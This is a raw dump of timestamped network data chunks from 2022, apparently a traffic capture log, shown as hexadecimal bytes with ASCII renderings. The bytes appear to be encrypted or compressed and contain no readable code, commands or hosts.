                                                                              2022-04-26 19:08:56 UTC384INData Raw: 5f b6 05 7f 7d d5 4e b0 13 83 9d 93 c8 97 96 51 ed ec ec 69 52 9e d9 40 c7 4e 92 18 87 e4 41 78 b7 50 8f 37 ae e7 5f 51 86 86 11 5a 81 6f 0d bd e0 54 98 b5 c3 ec 09 68 dc 17 14 91 d6 55 df 1a 51 f1 bf 0a f1 39 96 88 8b 4b 5e 1c 6b b3 82 ab bf 64 76 75 44 1e 60 07 db 59 5d 83 c5 56 9e c2 09 6e 2c f1 81 75 54 2f ae 82 f1 8c 60 ba c1 c8 fb a0 07 f4 89 e7 4b 7f d5 f6 43 51 1d 8a 73 e0 3a 8c 40 83 a3 2e f6 7e cd de ba e6 05 5a fb 09 69 5a ab 96 fe 8d e4 a0 12 f4 76 5b b1 86 a7 ab a1 9f ca e3 a3 da 31 da 0c 98 87 c8 1e 4e aa 52 49 14 0f 0b 01 eb cd 83 d5 29 49 cd 9f 7b f8 92 37 a4 16 a7 f7 d8 9a 7f 84 14 22 dc 0c 42 67 66 8d a1 d0 19 1c d9 e3 63 bd 1c ac 4e ab 6b 7f e9 7a 67 01 38 c4 d2 b4 c2 78 31 0c cc 3d fb 67 89 44 f3 53 92 dc 6f eb ab 00 f8 0c be f4 6d a7
                                                                              Data Ascii: _}NQiR@NAxP7_QZoThUQ9K^kdvuD`Y]Vn,uT/`KCQs:@.~ZiZv[1NRI)I{7"BgfcNkzg8x1=gDSom
                                                                              2022-04-26 19:08:56 UTC400INData Raw: 44 18 8b 2e 05 ee 4b 0d ee eb 6d 13 b3 a6 81 e5 a1 67 c6 14 bb bf 6a e3 d6 e5 ec 65 54 ce b6 01 45 56 44 a2 c5 a3 cb e5 bf d3 70 cc 12 5a 05 90 fd ce 14 5e 1a 20 a2 79 08 b3 50 9c 08 4e 1c e9 ea b3 87 9b 5c a0 1d fc f2 f3 77 5f 17 7a 2d 6f 6f 82 25 f3 10 88 e2 9c 63 e2 6b b6 20 a2 7f 71 03 0b db c5 eb 8e a3 1e a2 c9 b0 3f 47 16 20 a5 e5 ca a1 d1 3c 2e 84 dc 5f 3a 98 2a 02 33 0e af f0 07 35 25 fe 2e 82 4a d0 e5 64 0c 77 9d 7f b2 95 d1 f2 d0 26 c0 05 73 81 34 d8 82 48 23 48 e6 12 39 59 2a a3 12 92 1a d7 9d 37 f4 ac b3 29 06 b1 01 aa 7e b3 b8 3b 31 79 ea 87 76 54 96 51 d6 41 55 95 b2 ee 3c 11 a3 1d d9 64 93 89 c5 5d b2 5e 24 59 a9 06 08 ca 14 0a 18 6c 95 5c fa f8 6a 4d 4c 76 78 78 8d f5 10 2d 1d 82 6c cc da 58 80 7e 40 e0 df b5 6f 76 79 11 0d 82 58 ba 2e 48
                                                                              Data Ascii: D.KmgjeTEVDpZ^ yPN\w_z-oo%ck q?G <._:*35%.Jdw&s4H#H9Y*7)~;1yvTQAU<d]^$Yl\jMLvxx-lX~@ovyX.H
                                                                              2022-04-26 19:08:56 UTC416INData Raw: b5 40 0c 29 70 f8 20 3a 35 78 ef 25 d5 55 83 d8 93 43 73 aa 01 3c 60 1d ae 20 0f ff 30 b7 b4 70 73 e2 02 d1 a6 9c a2 85 03 da 88 cf aa 47 b0 58 7b a0 96 fd dd bf 8f bc 24 8d 9d 3c fe 29 a4 64 90 00 01 5f 27 21 82 c2 06 be 8e 57 74 c8 6a 34 46 1c b6 f1 8a e0 63 89 8b df 2e ee bb 35 a8 3d 47 34 a8 f5 5f ca ab 07 25 0b b6 c4 c7 d9 e3 09 c5 d4 ff c9 c0 41 da dd 81 58 00 ea fc 95 74 9c 8d 80 c2 9b d7 e3 46 81 f8 4e bd 51 2c 2b c8 21 ea f2 28 2f e7 ae 23 9d 90 79 81 59 fd 7e cc 4c a9 3c e2 8f 8a 4e 7a 6f 9e dd d9 7f 8f 7a 25 07 94 d0 27 1b 52 6e 0b 87 e1 5c c3 20 63 d7 7d 6a 33 63 3d cf 39 63 9c 22 31 48 48 81 fb 3d c8 98 c2 89 05 8b 35 14 2d 10 32 4a 53 35 f8 cd 9a 10 3a 6c d5 fc 54 44 39 66 60 ea a6 83 52 2d cd 83 07 25 46 d8 fb 86 25 45 e8 c8 66 8e e9 22 ca
                                                                              Data Ascii: @)p :5x%UCs<` 0psGX{$<)d_'!Wtj4Fc.5=G4_%AXtFNQ,+!(/#yY~L<Nzoz%'Rn\ c}j3c=9c"1HH=5-2JS5:lTD9f`R-%F%Ef"
                                                                              2022-04-26 19:08:56 UTC432INData Raw: b4 d7 da 02 a2 a6 3a 17 19 96 00 bc 8e c2 8c 40 eb 5e ac bf d9 5b 8d 03 e6 c0 42 f0 30 b5 9f 2b 80 80 8d 0f 62 e6 52 6d 85 ee 0b 84 94 9f 5d 04 8e 02 d4 f9 b0 da 10 ed 7f c1 c5 35 96 41 dd 78 23 41 b2 76 b1 02 5e 54 72 22 13 d8 56 14 ae fc 21 1f 62 9d 5b 8f f1 0f 52 3f 3f e7 69 dd fa 88 5f 9a 76 bc 41 6f 17 90 81 7e 6a ed c6 36 03 0c 10 4b 38 d7 63 1f 1a 85 94 fe f4 65 ee b8 36 9f 9d d5 b3 ac 02 00 f5 8d 4b f3 63 a0 53 12 dc 6a 41 93 a2 94 28 35 33 79 c4 a1 57 a5 38 13 e8 5b 72 9e 98 67 d4 54 65 a2 16 48 78 21 52 26 28 b0 dd ed 54 b5 2e 0c f7 28 26 d8 a0 5c b0 a1 79 5f 1e d3 2f e3 e1 30 e3 5f 58 3f 04 ef 60 dd 96 4b 1c a5 57 e4 a7 86 c0 2a 53 17 11 8a 1a 9a 37 f2 05 66 8a d8 d9 16 d7 42 77 50 de 0c 8a d0 b0 7f ae b9 b9 e7 c5 75 2d 88 4b f7 52 70 1e e0 c0
                                                                              Data Ascii: :@^[B0+bRm]5Ax#Av^Tr"V!b[R??i_vAo~j6K8ce6KcSjA(53yW8[rgTeHx!R&(T.(&\y_/0_X?`KW*S7fBwPu-KRp
                                                                              2022-04-26 19:08:56 UTC443INData Raw: 50 a2 e9 9b 47 f7 b9 d2 ad b4 17 76 69 6c 32 05 06 0d 29 ac fa 3e f8 b0 73 88 4e dc fd e3 26 53 56 6b 6a 7d 1b 06 b9 5f 93 d0 e6 ee dd 6c 86 a6 27 50 62 75 f8 a3 b8 e1 dd 2c 23 24 3d 2b 03 bc c4 49 65 2d e1 60 57 82 cd 4a 6d 17 a1 81 11 b6 c3 2e 46 04 d2 c7 10 3a 16 0b 10 10 74 84 70 4f 22 4a 03 53 bc 3d df 11 bb cc 9e 16 3e b7 fe eb 8f 6d 3f 33 0f c0 17 36 49 27 da 68 98 bd 8e 0c 50 81 b0 b1 f8 bf 72 ba 77 15 08 d4 d1 24 b7 dc ca b6 1b 6a 78 22 2d 16 01 28 e2 3e 7b 8c 93 b0 65 14 49 a6 3e de 0c cf 15 87 3e 33 c2 eb 0f 09 65 96 f3 84 1f 08 e4 d7 9c fa 20 c1 f7 d6 3f 34 46 04 1f 8f 5b bc 2a c5 2c ff ae 60 5e 4f 11 73 00 b9 d5 22 22 93 58 5c 2c 1c 44 75 c8 6e 61 01 5b 2f 3c a8 54 12 92 01 5f d6 dc 67 f4 cc 99 4d 35 a3 1b fc fa b7 47 5e 59 aa e6 75 e2 5b 71
                                                                              Data Ascii: PGvil2)>sN&SVkj}_l'Pbu,#$=+Ie-`WJm.F:tpO"JS=>m?36I'hPrw$jx"-(>{eI>>3e ?4F[*,`^Os""X\,Duna[/<T_gM5G^Yu[q
                                                                              2022-04-26 19:08:56 UTC459INData Raw: c1 2c 53 1d 19 32 cb 30 69 29 a0 6d 40 5a e3 b8 db 89 9e 5f 7e 65 92 b0 75 03 2f 9b 1c 51 8a 31 79 19 e8 b6 17 bb d4 c4 35 2d 44 f2 99 18 92 e3 b2 01 f0 c2 e0 80 ad 42 84 ce 47 1f e5 f6 de 3e 09 56 6f 38 5f 21 a0 50 9d 8f d0 1c a7 83 8a 47 f1 58 fb a5 5b df fb 59 5c 0e c9 2d 0b 97 e4 9f 0e c6 cf d8 55 01 0d 45 70 dd 4c 79 86 d2 bf 30 a9 39 3b 11 2a 74 5c 0d 08 c1 60 0d 05 ee f9 b4 9c b0 1a 48 b2 8a 7a f6 5d 18 f6 8e 4f f6 09 48 50 ce 14 87 2d 99 5f b1 30 1b 83 8f 54 cb da e3 79 28 ed e6 bd 4c fd 1d 5f 5d fe f9 ca 6b 35 e4 96 0e 96 5a df ea 2a 8d 2c 0c 1a 87 83 b3 6d d6 5e 41 1e 84 12 ea c0 9d 86 f9 c2 20 79 f4 da 58 ad 1f fa 89 e3 bf ce fa fc b7 ea ef c8 6d c8 e1 f8 db ff 5b 5a 4c 5d a4 28 10 80 f2 90 a3 47 7f e7 70 a2 03 80 ee bb ab 6c 32 f7 f6 7f 1a 5a
                                                                              Data Ascii: ,S20i)m@Z_~eu/Q1y5-DBG>Vo8_!PGX[Y\-UEpLy09;*t\`Hz]OHP-_0Ty(L_]k5Z*,m^A yXm[ZL](Gpl2Z
                                                                              2022-04-26 19:08:56 UTC475INData Raw: 61 fa 08 29 d4 91 3c 6b fa ab b7 12 3a b0 7a 5f 08 86 f1 4b d5 4f d1 a9 c6 c9 10 88 d9 d8 e4 fe 4e 0b b7 88 18 30 45 1e 0f 24 48 fc f9 cf e1 de 2c 7c df 53 20 76 a2 79 fc f5 39 f1 20 f4 cd 13 f7 ff 57 37 92 c4 18 9c e8 44 a3 f6 74 e9 22 52 c7 f8 df e7 b5 49 a6 ea ca bc 1d c5 2f f6 ad ae 3a 0f 8d 10 3d 56 0c db b9 86 ff 19 27 79 3e 0b 6f c3 7a e8 df e2 23 c9 be 83 36 7f a5 60 7e e4 ac f0 0a 84 6f cf 3f 53 e6 cc 5c 7d e5 b3 78 34 59 29 10 7c 23 4f 7b bc dc 29 cd 1e a8 17 79 a1 6d 20 e1 54 2e f2 2d a4 53 cd 7e a2 03 60 e5 23 34 dd f4 82 9f 12 73 e0 69 93 9f 52 53 12 71 d4 ae 0a e1 ed 4d 6e cb 50 4b 4a 82 51 fb 11 c6 5c 2f a7 65 39 c5 83 46 74 5e 90 2b 79 21 bf 78 a4 24 e6 f0 1d bd 17 89 67 2d 8d b7 9e d7 96 34 6b 8d 2b c7 5b 83 b1 2c b8 bd 4c 5c c3 00 4f b0
                                                                              Data Ascii: a)<k:z_KON0E$H,|S vy9 W7Dt"RI/:=V'y>oz#6`~o?S\}x4Y)|#O{)ym T.-S~`#4siRSqMnPKJQ\/e9Ft^+y!x$g-4k+[,L\O
                                                                              2022-04-26 19:08:56 UTC491INData Raw: 61 4b ce b4 95 04 52 9a d6 27 85 c9 e5 9b f8 2f 99 d6 9f d3 4b 5f 6a a2 27 72 d5 09 fb 69 78 00 27 c7 aa 63 54 97 ca c9 23 9b 74 67 57 29 34 e5 c7 a7 ab 52 0e e5 d9 01 c7 4e 14 13 97 01 ee e6 d2 37 c1 48 7a aa 79 08 b2 43 a3 16 d5 38 91 07 8c 9d f3 0f db a9 ab ef 39 9d 03 7e 9c 00 1d a3 2f 3f 15 b3 60 6b e0 7e 54 4f d6 fd 08 0e 11 16 8e db 2b 3d 14 7d 9c bf 1f dc 34 99 8c 62 9e 8b fe 46 09 fd c1 b3 26 55 00 4d 11 1e ca f0 5b 9f 92 62 49 55 81 03 38 71 d3 61 d0 dd 4b 1f 20 7c 45 c4 1f df db 9f 74 52 32 b0 72 5f 62 e7 a9 10 58 53 d8 bb 48 25 aa 62 48 3d b2 93 cd 5d 9d 47 71 33 4a 3a 56 36 8f 32 1f 6d 39 4a 8e e9 d5 b5 a2 5f 86 16 74 40 ba e3 9c 18 17 b1 82 ac a8 cc dc 82 45 a0 cb 12 47 30 6e af 85 d8 c0 7f aa 19 2e b8 f3 2b 96 fd c7 f4 4e c7 14 95 e1 60 cd
                                                                              Data Ascii: aKR'/K_j'rix'cT#tgW)4RN7HzyC89~/?`k~TO+=}4bF&UM[bIU8qaK |EtR2r_bXSH%bH=]Gq3J:V62m9J_t@EG0n.+N`
                                                                              2022-04-26 19:08:56 UTC507INData Raw: 36 fc 53 f3 15 24 dd c8 a3 d5 33 8d f7 43 1b 20 e1 5f 4f e6 ff e7 4d 7c 9a dc 18 27 73 63 ae 65 49 49 e2 db 0b d4 9c 0d 7a 90 eb c6 e8 87 8d 46 73 c0 21 38 96 03 25 92 4c 24 7e f4 03 e0 0c 4d 4f e8 17 76 99 9c d2 31 31 71 d7 e0 a1 80 4f 91 33 08 00 aa 18 4b 4a 9f 50 2e 50 e0 45 ee 33 06 c5 a8 9f fb 10 6e 84 96 86 00 b5 72 30 63 47 3b 1d 94 d1 49 55 3a 30 a3 f5 e9 df 53 5a 58 7a 0a a9 23 76 b8 1a b7 6c d4 ec a7 af b8 4d 6a 25 fe 39 8b b8 28 72 b2 de f6 21 ac ab 7c 09 ec e9 73 b2 b5 e7 f3 5d 5c 29 66 09 ec 40 79 57 e6 92 6a 05 d8 13 b3 f5 6d ca b8 75 bb 16 fb 42 d1 ae e3 6d cf a3 17 86 72 6c 7b 12 94 d6 5b e4 3f 92 0f 6f a2 c1 d8 c6 4e a7 7f 8f b8 4f f3 b5 4f 05 c5 6d d6 35 a7 e6 d8 0c e5 9c 67 ad fa a2 85 ef a5 02 f3 e0 fd d7 ae 6a f1 8c b3 d0 93 d3 fb e7
                                                                              Data Ascii: 6S$3C _OM|'sceIIzFs!8%L$~MOv11qO3KJP.PE3nr0cG;IU:0SZXz#vlMj%9(r!|s]\)f@yWjmuBmrl{[?oNOOm5gj
                                                                              2022-04-26 19:08:56 UTC523INData Raw: a9 31 00 d9 f4 cd 99 6a 26 f6 fb 35 35 a1 c8 9b c5 0d 25 89 57 62 39 bc 58 4b ef 7e 7a 23 03 83 8c 7f 4c 0b ff 29 58 8d 9c 24 f3 9b 83 71 98 4b 9d e7 f8 71 77 f3 ee 6e 09 57 eb 59 39 3d 94 da 00 2d ae 09 6b 23 a2 a8 e3 5f 0c 8a 2e 63 b2 5e 99 17 ff 3c 0c 46 47 66 57 39 d3 1a 4c 80 9e b3 4c 93 f7 7f ae f5 62 5e 6c f6 dd 8d e4 46 fd fe 85 af ee e9 3b 65 3c d1 de 65 e0 93 46 c1 08 68 09 bf 69 a7 4f 45 7d 86 29 b4 55 45 89 09 1b 11 1a d0 0e ef 31 a4 2b 41 c1 b2 c8 8c 05 10 38 c3 9e 60 ab 00 9d bc 6b 5a ba a6 dd 2a 77 cf d9 57 e2 fc 4a 84 7c 8d 75 f6 dc 9b 73 e1 6f 6c 4d 3a d7 84 c6 2b ed a4 30 d7 79 90 f1 88 b9 bd cd 1c e2 f6 b0 ea f3 57 3c b2 73 aa 19 10 ae 25 92 17 db 5b 08 c2 56 43 d8 1a 20 e0 f1 9d 6e d7 12 e8 f3 b3 5e 10 16 48 3f 80 05 4e 92 b2 9c fe 73
                                                                              Data Ascii: 1j&55%Wb9XK~z#L)X$qKqwnWY9=-k#_.c^<FGfW9LLb^lF;e<eFhiOE})UE1+A8`kZ*wWJ|usolM:+0yW<s%[VC n^H?Ns
                                                                              2022-04-26 19:08:56 UTC539INData Raw: 16 32 8f 8b 59 ec e8 35 ce 13 f0 7d 72 ff cb bb 48 74 50 23 a7 af ea 4b fd 6e b6 b6 c3 7e c8 9a cb 7d 44 a6 b1 87 98 77 ae 9c b1 2d d1 a9 f6 da 64 53 06 98 bc 36 51 15 3a da f2 8b 64 66 88 55 2d 01 2e 3a a9 2a 06 d2 31 ae 49 fb 30 76 24 43 49 ae ff 23 ff be 9d 84 36 95 c5 42 1e 0f 84 2d 96 c9 b1 39 de c9 7a b5 76 c6 c4 21 9f f4 87 f5 a6 c8 4b 09 4d b9 f9 1d 93 e7 30 6a d4 be 12 be 0d 54 98 a7 24 a5 5e 3f ff c6 f5 ed fb 48 cb 33 a6 4c 3c 3a d1 be 77 51 9b 4b 7d 51 d4 ae 5e b3 55 4e 14 5d 8a 6a 4d 49 ce 97 e7 a0 f3 f2 83 a6 ad b7 2a f1 a3 3f 68 bf 0b 0f 91 e7 31 0c b7 8d d6 ba ff ac ab 2a a2 31 79 ee c1 22 d5 e0 c6 63 0b 57 06 8b 64 f3 c0 af e5 19 4b aa 4d c8 34 dd d9 62 4c f8 5d 72 93 f8 fb da 41 37 f3 c8 72 30 37 ac cc 5b 71 c0 9e a1 9c 07 d1 81 d7 21 11
                                                                              Data Ascii: 2Y5}rHtP#Kn~}Dw-dS6Q:dfU-.:*1I0v$CI#6B-9zv!KM0jT$^?H3L<:wQK}Q^UN]jMI*?h1*1y"cWdKM4bL]rA7r07[q!
                                                                              2022-04-26 19:08:56 UTC555INData Raw: cd 04 8f d7 03 90 6f dd d2 e4 f5 d7 03 b0 e4 bc 95 e9 85 ee 0a b0 b0 14 3b ff 61 75 45 25 73 b1 8a 3b 65 82 10 d8 3f bb dc 7e 8a 86 df 63 9e 8a c2 fa f2 d7 da b4 c5 34 d4 61 3f bf 4f 61 b5 c7 35 e7 55 8b 3f f5 8a cb 6b 47 f5 01 08 9e 48 60 22 e2 6a 48 3c ce 40 a4 1d 5b 92 3e 49 da d5 38 8a 7c c7 26 c6 11 33 7e a7 fb 81 19 5e 0c 1c 8b 80 54 89 32 ad 7b 5e af 7b 91 a8 28 82 07 ec 25 ee a6 5d 51 80 5b 11 9e da e5 de 72 ed 38 ea 28 91 fc bc dd d3 ff 14 e1 15 b5 60 49 0a 1c b0 e7 fd 04 f3 65 48 09 f4 de d0 cd 95 61 cc 87 ae 8f 1e 18 66 eb d6 e3 ae 3c d1 a5 c8 1a bf 71 c0 f6 8d 6b e0 01 31 96 4e 19 ca cd 62 69 b8 bf 6b e7 bc d8 e7 33 0d b8 71 2f 5b 7b c3 0a 87 04 b2 5c ee 91 f7 da ad 33 34 be c0 2b fa 4a 15 f2 56 be c1 85 e2 ce 1b c7 85 33 d8 42 1f 91 31 d5 86
                                                                              Data Ascii: o;auE%s;e?~c4a?Oa5U?kGH`"jH<@[>I8|&3~^T2{^{(%]Q[r8(`IeHaf<qk1Nbik3q/[{\34+JV3B1
                                                                              2022-04-26 19:08:56 UTC571INData Raw: 33 d9 20 99 0b 49 d3 b0 a3 b0 46 b6 4e 1c 89 45 4c 8a fa b3 99 c9 2b 91 e3 50 22 28 37 e1 20 17 ae 2b 0d 32 a1 60 b9 67 6f df 88 cf 1c 2f d8 f8 2e 9b 85 d1 ff 27 17 7b 21 67 92 67 92 d2 c4 c9 55 5c 9b 76 ed b1 a9 23 ba ac c1 98 3d 23 17 dc 00 1a de df 75 4f 03 65 ee 5d 1e 4a df 42 8d b1 73 0e 4a c6 38 e7 45 5b 23 69 43 ce 19 46 6a 65 1f 4a f5 d7 ef 18 40 1d d7 15 96 b6 3a 7c df a0 c6 42 bf b0 97 c5 0a 2e da 30 cf 9b 44 45 00 83 5d 4e b0 11 ff 8e 56 53 d5 39 50 6b a1 12 9f 28 cd 7a 8e b3 5e 5a 70 38 78 eb df c9 d0 ef e7 f7 2d 5f c5 96 7b 67 90 60 a2 94 fc e3 72 e5 86 96 0d a5 eb c8 f3 69 db d7 29 2d 3e 9a 71 3b 16 92 d7 0e 13 d3 d5 52 1c 4f 13 2a 3e c5 a4 21 64 92 be e9 90 b1 28 09 4e be 94 b8 62 a5 7a ee eb 73 fb 61 df b1 04 ac 2b ce 96 4b 95 59 d5 64 3d
                                                                              Data Ascii: 3 IFNEL+P"(7 +2`go/.'{!ggU\v#=#uOe]JBsJ8E[#iCFjeJ@:|B.0DE]NVS9Pk(z^Zp8x-_{g`ri)->q;RO*>!d(Nbzsa+KYd=
                                                                              2022-04-26 19:08:56 UTC587INData Raw: 1a ed 7b f9 75 be 5c fc 5c 4f 17 9b ef 03 15 78 67 15 f9 5e e8 56 8c a6 90 ad 76 70 8e 27 3b 44 02 4c 2e 88 66 bb a8 63 c4 c2 10 5b c9 2a 36 7c 4d 43 2d 2b 88 e2 f6 4d c4 21 32 f4 fe 26 99 e2 d5 a6 ca ac 58 b7 9f 4f 06 9b 7d 43 03 21 34 1b 3c 8a 73 64 3c 97 3b 3d 9b 6a 0c 67 80 56 27 03 17 a1 a1 b7 af 94 b6 c0 59 72 12 9a 61 ab 59 93 e3 f8 de 60 ca 4f f9 4d 13 1a a4 6e ce 1a cd c3 9d b4 5e cc 49 a4 47 26 b6 0b 49 25 9b 2a 03 ea 78 0c a8 7e 0c 3e d1 d7 37 44 89 83 96 2b 12 13 4d 7a da e6 fc 0e 1a 86 6b a5 9a 9d 08 57 4a f2 78 f9 58 a3 47 5f 07 5c ac e6 b3 8a 16 46 ec 26 d8 0b 0c ad c9 a4 8e af 7c 95 4c 43 de 4a 19 a1 40 02 07 cf 25 1b d3 62 64 2d 9f 25 91 41 df ed 6b 73 cf d8 14 c7 94 69 7e b2 bd 67 55 73 e2 a9 12 ec e4 ed d1 3c 09 d5 2e ac dc 77 3d d2 81
                                                                              Data Ascii: {u\\Oxg^Vvp';DL.fc[*6|MC-+M!2&XO}C!4<sd<;=jgV'YraY`OMn^IG&I%*x~>7D+MzkWJxXG_\F&|LCJ@%bd-%Aksi~gUs<.w=
                                                                              2022-04-26 19:08:56 UTC603INData Raw: 2b 84 1e 0c d5 9a c7 0d 56 61 ba 73 1e 11 f0 56 02 f6 4f 84 96 b5 30 b1 f1 c1 c2 59 59 9f 35 da cb 5e 5d 7c 9a 49 41 5d c3 e9 c0 b3 90 af 0c e9 88 bc ec 5e a0 f6 08 ad ff 1a 80 09 66 b2 32 df 45 51 1f bd 9c 89 ee a4 f8 8c 51 d8 17 d9 b8 d3 b2 0b 3d 31 08 ba d1 16 65 33 8d 72 40 af 93 9c 97 59 f8 97 db 0f 9c 1c 01 12 3a d8 52 e6 74 93 23 fe ce cf 27 f2 a4 2b 9f 2a fb 47 44 89 41 1b dd a9 b4 7e ac 07 0a 36 07 f1 6f 7f 92 95 bc 64 a9 b5 8e 30 19 49 f8 7e 1d b3 6b 74 a2 86 3e da f6 6a 3d ca 1a 27 69 be 10 78 5a 7f e1 4f 52 97 75 0e aa 98 72 3f 22 db 3a 98 6f 6b c0 a6 a3 6c 0b ad 7b 3e c7 1b a1 8a 1a 9b 76 2a 86 23 e0 72 d3 f4 49 36 f0 89 27 ef 43 2f 37 db 9c 92 31 17 c6 94 0e 8d 8b a2 a7 e5 f4 87 cf e6 cb 48 e3 60 10 7a d9 d2 64 f0 21 9f 6e 8e 57 83 eb 58 1f
                                                                              Data Ascii: +VasVO0YY5^]|IA]^f2EQQ=1e3r@Y:Rt#'+*GDA~6od0I~kt>j='ixZORur?":okl{>v*#rI6'C/71H`zd!nWX
                                                                              2022-04-26 19:08:56 UTC619INData Raw: 12 48 9e 0a 08 b4 02 cc 1d f0 19 fb 59 a0 6a 8a 53 e7 7c 9e 69 c0 55 cc bd 63 45 ad 5c 79 9a 6d d8 7d 90 65 e1 42 eb b5 04 45 ec c5 cf 9b 7d 1c 7b eb ad 4b 77 75 46 37 05 8e 70 52 8e f8 79 26 39 c3 a9 4f 19 94 9b d1 0e e6 6f b2 ab fc e7 f9 71 33 e3 89 94 ba 0c df ef ec 39 d7 22 c0 12 73 f3 ca 2b b9 8b 15 96 8a 5a 1a d9 6f bb 08 59 b5 0d 14 a2 31 4e 9c 3d f0 3b 1b 46 10 68 26 a5 0d 6b 4f f5 ca b6 0a e7 1a 92 07 f5 00 a2 b4 24 45 70 aa d5 17 2a 59 0d 7c 8b 28 c6 03 f6 53 bb 59 d0 78 c7 dd 5a 3a 7c b5 6f 0c 45 2b 60 9d 27 36 cc 57 a5 a5 70 07 74 ae 98 c9 c4 15 fa fe b4 1b 20 8c c6 9d 36 00 f2 77 6b 4d 46 fe 26 e0 35 18 90 5a 39 bf b3 ea ee 44 c1 8b 23 a6 6e 88 84 52 f0 a4 f8 1b 22 65 42 d3 39 d3 f5 5a a4 9f b9 0b 87 d1 d2 ae 5a 9b bb cd 7c 7e 59 0c 68 65 74
                                                                              Data Ascii: HYjS|iUcE\ym}eBE}{KwuF7pRy&9Ooq39"s+ZoY1N=;Fh&kO$Ep*Y|(SYxZ:|oE+`'6Wpt 6wkMF&5Z9D#nR"eB9ZZ|~Yhet
                                                                              2022-04-26 19:08:56 UTC635INData Raw: 3c cc 56 75 6c cd 9d c1 99 65 f8 0a 03 64 32 87 0a 68 ad 17 9b f3 db d7 53 49 aa ad 05 47 eb c7 41 8a 9e 24 40 94 17 9c f9 90 89 8a af 6c 37 83 91 3d a9 d4 21 50 a7 55 ef 1a 4c b7 b8 ab 28 51 2a 24 56 11 e3 2a d3 5c e8 05 70 9e 0c 34 66 78 29 ac 57 06 8d c3 aa 15 5e 06 df 45 9d 75 11 ed 4f 10 0f 3d ea fd 36 b7 65 b5 c0 e9 7b 35 6b ed 52 e5 56 25 26 6c ee 13 a8 3c 81 37 87 66 e7 bf 63 02 91 ad a6 bd dd 0b 5a fd 2c ba f0 ac 89 ba fa 53 f6 d0 ec 05 39 e0 9e fb 04 56 3a 97 7b d6 fd 50 59 2c 43 8a fe 6e 0a b4 d1 e5 6b 79 15 2a 01 2a 9f 4d aa cd df a6 95 92 9a d3 39 e3 b2 d3 26 13 e8 54 f4 53 b2 0b b5 57 66 90 c8 0d 69 7c 00 5a 26 52 23 1a e4 3a dc dc 9e 41 3e 1b 66 24 bf b1 87 54 f7 8f 07 3e 56 93 1a 7f 20 54 09 3d 99 9d 02 6d f4 61 4c 47 97 d9 42 88 1c dd ef
                                                                              Data Ascii: <Vuled2hSIGA$@l7=!PUL(Q*$V*\p4fx)W^EuO=6e{5kRV%&l<7fcZ,S9V:{PY,Cnky**M9&TSWfi|Z&R#:A>f$T>V T=maLGB
                                                                              2022-04-26 19:08:56 UTC651INData Raw: 44 ea 3e ee 8a 99 ea d6 14 0a ef e0 98 97 b2 75 00 f7 94 e8 52 6c 76 67 4e 62 c5 65 d0 22 1a d5 7d 42 1a 21 86 37 e4 af 3f 38 0a 0b 17 93 38 d1 06 dd da db b1 08 51 aa 28 3c 8c 71 fd 70 f0 c3 9b 8a d6 ae 0b 04 4b 0f e0 94 c0 ea 13 31 a3 c4 b3 69 52 36 a6 4d 98 ac 68 ca d5 aa b2 10 16 bc 3c a6 3f 16 0d 96 78 8e d5 e7 40 3f 07 d7 e4 1f 4e db 30 ee b1 f5 7c cc 0b 09 ff c0 56 55 95 99 dc 01 51 ab 44 d2 c8 8a 2d ec f2 99 a6 71 83 28 bc a8 2d 07 ed 72 36 d5 72 79 af 53 46 83 b7 39 c9 10 64 d8 77 aa ea 13 bd 9c 85 ac 01 ac fd 48 0a 9e 30 40 ed 1c 05 6a a2 8e 28 80 c0 34 a7 b3 90 e3 f0 80 b9 31 1e 6d e0 24 09 aa 11 14 1e fb 7a c4 f6 73 fa f5 d2 73 d6 fd f2 b1 7a f9 a4 af 2a e9 61 67 d4 b7 04 11 6a 31 4e a1 72 ac 54 21 7b 84 13 d5 92 fa 9d cf 07 cb 55 97 c2 f6 01
                                                                              Data Ascii: D>uRlvgNbe"}B!7?88Q(<qpK1iR6Mh<?x@?N0|VUQD-q(-r6rySF9dwH0@j(41m$zssz*agj1NrT!{U
                                                                              2022-04-26 19:08:56 UTC667INData Raw: 2b 2e fb 10 0d a7 dd 42 49 22 06 1c bb f6 49 a0 18 d2 ec c7 d8 f4 f6 de ec b5 a8 d6 9d f5 b0 d2 49 76 4f 6a 18 11 55 87 aa fb 9d 35 1c b9 24 27 5e dc 80 72 55 65 45 57 6e 22 82 f0 30 46 4d 65 1e e9 64 97 07 c3 61 d9 0c 4d a6 8a a6 24 6a 70 6b cf 47 97 bd 4a 82 d2 05 9d 47 3b 6a 70 a2 c8 30 89 26 67 4a ef f1 85 1e 6e b7 fd 1b dc 2d 6d cb dc 2b 36 33 77 33 4b 55 01 ae e9 15 fc c1 a5 0c 75 ed 64 05 74 a4 52 9f cd 22 85 55 bb 46 b1 e5 0d da aa e7 22 c7 3f 49 37 48 9e 76 39 51 62 82 f5 4a 64 63 9c e0 49 24 54 da b9 68 96 52 bd d6 e8 4d 22 f0 73 7f 5e 55 bb 9b 43 64 cf d0 6d 55 bf 27 d5 b9 f5 9b 60 ae cc 83 d0 9e 9a f7 d1 3e b7 e0 2c f8 08 bf 9a 37 3b 12 80 23 b8 02 ab fa 3f 29 ca 5d 3b 94 fe 87 79 51 0e b2 e4 65 45 8e 00 de af a6 ea 04 6b 0c 3d 8b 35 d5 c0 66
                                                                              Data Ascii: +.BI"IIvOjU5$'^rUeEWn"0FMedaM$jpkGJG;jp0&gJn-m+63w3KUudtR"UF"?I7Hv9QbJdcI$ThRM"s^UCdmU'`>,7;#?)];yQeEk=5f
                                                                              2022-04-26 19:08:56 UTC683INData Raw: dc 13 a5 c0 c5 87 57 60 9f 62 dc ff f6 96 cd 94 8e 21 a8 d8 ac 20 76 82 80 88 ca 0e fe 98 cd 7e 1e 9f 7f 7e 82 0f 10 b4 92 da 38 da 42 19 3f ea ff 95 6b 5d b5 96 c1 7c 82 ea b5 5f b8 5d a0 8c 59 1a d4 1f e9 38 0a 20 42 3f fa 48 81 cb 90 39 b5 c7 8c a9 2c e5 ad dc 08 26 38 61 ee fe 0e ee fc 64 c8 bb 6f 86 e9 1d 7e a8 c3 39 5c 51 f1 78 db 8a df b5 d9 8d 6a 5b 28 3f 94 ad 72 26 3a c2 36 ea a4 8d db 4b e3 e5 ee fb f4 a2 04 9f f0 80 61 14 c1 4f 4f 70 26 ca b7 d0 2c c1 ad cd 27 1f 3f 20 d6 a6 76 2f 94 ed 01 c3 a4 f1 be c2 8c 3e 61 ff f7 09 af 9e f1 09 00 64 b0 1d a5 f4 d6 a0 eb c4 f1 b4 7b 44 9b df e8 73 f0 b9 9e 74 d2 66 14 bd 3c 0b 